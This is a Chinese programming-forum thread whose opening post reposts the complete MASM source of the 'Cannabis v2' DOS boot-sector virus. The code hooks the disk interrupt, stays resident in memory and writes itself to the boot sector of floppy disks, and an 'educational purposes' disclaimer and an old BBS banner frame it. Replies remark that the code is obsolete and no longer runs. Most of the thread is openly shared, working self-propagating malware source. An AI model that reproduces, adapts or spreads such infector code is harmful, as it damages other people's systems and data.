标题:【转】一个病毒代码分享,切勿做坏事
只看楼主
努力的汇编
Rank: 1
等 级:新手上路
帖 子:3
专家分:0
注 册:2012-11-26
结帖率:100%
 问题点数:0 回复次数:4 
【转】一个病毒代码分享,切勿做坏事
程序代码:
;****************************************************************************
;*  Cannabis    version 2
;*
;*  Compile with MASM 4.0
;*  (other assemblers will probably not produce the same result)
;*
;*  Disclaimer:
;*  This file is only for educational purposes. The author takes no
;*  responsibility for anything anyone does with this file. Do not
;*  modify this file!
;****************************************************************************

cseg            segment
                assume  cs:cseg,ds:cseg,es:nothing

                .RADIX  16

BASE            equ     7C00

                org     0

begin:          jmp     start

                org     3

                db      'CANNABIS'              ;BIOS parameter block
                dw      0200
                db      2
                dw      1
                db      2
                dw      112d
                dw      720d
                db      0FDh
                dw      2
                dw      9
                dw      2
                dw      0

                org     3E

start:          cli                             ;initialise segments + stack
                cld
                xor     ax,ax
                mov     ds,ax
                mov     ss,ax
                mov     sp,7C00

                mov     bx,offset ni13+BASE     ;check int13 vector
                mov     ax,ds:[4*13]
                cmp     ax,bx
                je      installed

                mov     ds:[oi13+BASE],ax       ;save old vector
                mov     ax,ds:[4*13+2]
                mov     ds:[oi13+2+BASE],ax

                mov     di,0400                 ;adjust memory size
                mov     ax,ds:[di+13]
                dec     ax
                mov     ds:[di+13],ax

                mov     cl,6                    ;ES -> top
                shl     ax,cl
                sub     ax,07C0
                mov     es,ax

                mov     cx,0200                 ;copy virus to top
                mov     si,sp                   ;SP=7C00
                mov     di,sp
        rep     movsb

                mov     ds:[4*13],bx            ;set new vector
                mov     ds:[4*13+2],es

installed:      xor     ax,ax
                push    ss
                pop     es
                mov     bx,0078
                lds     si,ss:[bx]              ;ds:si = int 1E (=table ptr)
                push    ds
                push    si
                push    ss
                push    bx
                mov     di,7C3Eh                ;move table -> ds:7C3E
                mov     cx,0Bh
        rep     movsb
                push    es
                pop     ds
                mov     byte ptr [di-2], 0Fh    ;change values
                mov     cx,ds:[7C18]
                mov     [di-7],cl

                mov     [bx+2],ax               ;table -> ds:7C3E
                mov     word ptr [bx],7C3E
                sti
                int     13                      ;reset disk
                jc      error
                xor     ax,ax
                mov     cx,ds:[7C13]            ;number of sectors
                mov     ds:[7C20],cx
                mov     ax,ds:[7C16]            ;calculate root-entry (FAT)
                shl     ax,1
                inc     ax
                mov     ds:[7C50],ax            ;save value
                mov     ds:[7C49],ax

                mov     ax,ds:[7C11]            ;calculate IO.SYS entry
                mov     cl,4
                shr     ax,cl
                add     ds:[7C49],ax

                mov     bx,0500                 ;read directory
                mov     ax,ds:[7C50]
                call    readsector
                jc      error
                cmp     word ptr [bx], 'OI'     ;IO.SYS ?
                jne     ibmtest
                cmp     word ptr [bx+20], 'SM'  ;MSDOS.SYS ?
                je      continue
                jmp     short error

ibmtest:        cmp     word ptr [bx], 'BI'     ; ?
                jne     error
                cmp     word ptr [bx+20], 'BI'  ; ?
                je      continue

error:          mov     si,offset errortxt+BASE   ;print error-message
                call    print
                xor     ax,ax
                int     16                      ;wait for keypress
                pop     si                      ;restore int 1E vector
                pop     ds
                pop     [si]
                pop     [si+2]
                int     19                      ;boot again...


continue:       mov     bx,0700                 ;read 3 sectors of IO.SYS
                mov     cx,3                    ;at ds:0700
                mov     ax,ds:[7C49]            

nextsec:        call    readsector
                jc      error
                inc     ax
                add     bx,0200
                loop    nextsec

                mov     ch,ds:[7C15]            ;go to begin IO.SYS
                mov     dl,0
                mov     bx,ds:[7C49]
                mov     ax,0
                db      0EA, 0, 0, 70, 0


;****************************************************************************
;*              Read a sector
;****************************************************************************

readsector:     push    ax
                push    cx

                div     byte ptr ds:[7C18]      ;al=sec/9 (0-160) ah=sec. (0-8)
                cwd
                inc     ah                      ;ah=1-9 (sector)
                shr     al,1                    ;al=0-80 (track)
                adc     dh,0                    ;dh=0/1 (head) dl=0 (drive)
                xchg    ah,al
                xchg    ax,cx
                mov     ax,0201                 ;read it
                int     13

                pop     cx
                pop     ax
return:         ret


;****************************************************************************
;*              Print message
;****************************************************************************

print:          lodsb
                or      al,al
                jz      return
                mov     ah,0Eh
                mov     bx,7
                int     10
                jmp     short print


;****************************************************************************
;*              Int 13 handler
;****************************************************************************

ni13:           push    ax
                push    ds
                cmp     ah,2                    ;funktion 2 (read) ?
                jne     cancel
                test    dl,0FEh                 ;drive A: or B: ? (head=0)
                jnz     cancel
                xor     ax,ax
                mov     ds,ax
                test    byte ptr ds:[043F],1    ;is drive active now?
                jnz     cancel

infect:         push    cx
                push    bx
                push    di
                push    si
                push    es
                mov     ax,0201                 ;read bootsector at 7E00
                mov     bx,7E00
                mov     cx,1
                push    cs
                push    cs
                pop     es
                pop     ds
                pushf
                push    cs
                call    orgint13
                jc      exit

                mov     si,7E0Bh                ;move BPB to virus
                mov     di,7C0Bh
                mov     cl,33
        rep     movsb

                mov     ax,0301                 ;write virus to boot-sector
                mov     bx,7C00
                mov     cl,1
                pushf  
                push    cs
                call    orgint13

exit:           pop     es
                pop     si
                pop     di
                pop     bx
                pop     cx

cancel:         pop     ds
                pop     ax
orgint13:       jmp     dword ptr cs:[oi13+BASE]   ;original vector


;****************************************************************************
;*              Data
;****************************************************************************

oi13            dw      ?,?

errortxt        db      0Dh, 0Ah, 'Non-System disk or disk error'
                db      0Dh, 0Ah, 'Replace and press a key when ready'
                db      0Dh, 0Ah, 0

       
                org     01FEh

                db      55, 0AA

end:

cseg            ends
                end     begin

;****************************************************************************;
;                                                                            ;
;                     -=][][][][][][][][][][][][][][][=-                     ;
;                     -=]  P E R F E C T  C R I M E  [=-                     ;
;                     -=]      +31.(o)79.426o79      [=-                     ;
;                     -=]                            [=-                     ;
;                     -=] For All Your H/P/A/V Files [=-                     ;
;                     -=]    SysOp: Peter Venkman    [=-                     ;
;                     -=]                            [=-                     ;
;                     -=]      +31.(o)79.426o79      [=-                     ;
;                     -=]  P E R F E C T  C R I M E  [=-                     ;
;                     -=][][][][][][][][][][][][][][][=-                     ;
;                                                                            ;
;                    *** NOT FOR GENERAL DISTRIBUTION ***                    ;
;                                                                            ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed  ;
; Around Among the General Public. It Will be Very Useful for Learning how   ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can    ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding     ;
; Experience can Turn it Into a far More Malevolent Program Than it Already  ;
; Is. Keep This Code in Responsible Hands!                                   ;
;                                                                            ;
;****************************************************************************;
搜索更多相关主题的帖子: 病毒 分享 color 
2013-01-25 11:12
zklhp
Rank: 20Rank: 20Rank: 20Rank: 20Rank: 20
来 自:china
等 级:贵宾
威 望:254
帖 子:11485
专家分:33241
注 册:2007-7-10
得分:0 
排版真好啊 加个高亮罢 好奇的可以看看 不过都是DOS时代的东西了 到现在十来年快二十年了

多说一句 真想用这个做坏事也不可能了 能运行这个程序的计算机都没多少了、、、


[ 本帖最后由 zklhp 于 2013-1-25 12:10 编辑 ]
2013-01-25 12:08
Alar30
Rank: 10Rank: 10Rank: 10
等 级:贵宾
威 望:10
帖 子:988
专家分:1627
注 册:2009-9-8
得分:0 
请相信俺是好人
不会干坏事滴。。。
2013-01-28 13:53
wp231957
Rank: 16Rank: 16Rank: 16Rank: 16
来 自:神界
等 级:版主
威 望:422
帖 子:13681
专家分:53296
注 册:2012-10-18
得分:0 
呵呵

DO IT YOURSELF !
2013-01-31 21:54
罗庇鹏ksq
Rank: 5Rank: 5
来 自:太平洋
等 级:职业侠客
帖 子:220
专家分:310
注 册:2012-6-30
得分:0 
运行不了

从来都是无所谓,现在也该学着有所谓。✿咱们一个人,别坐井观天❀
2013-03-01 10:50



参与讨论请移步原网站贴子:https://bbs.bccn.net/thread-397583-1-1.html




关于我们 | 广告合作 | 编程中国 | 清除Cookies | TOP | 手机版

编程中国 版权所有,并保留所有权利。
Powered by Discuz, Processed in 0.535485 second(s), 7 queries.
Copyright©2004-2025, BCCN.NET, All Rights Reserved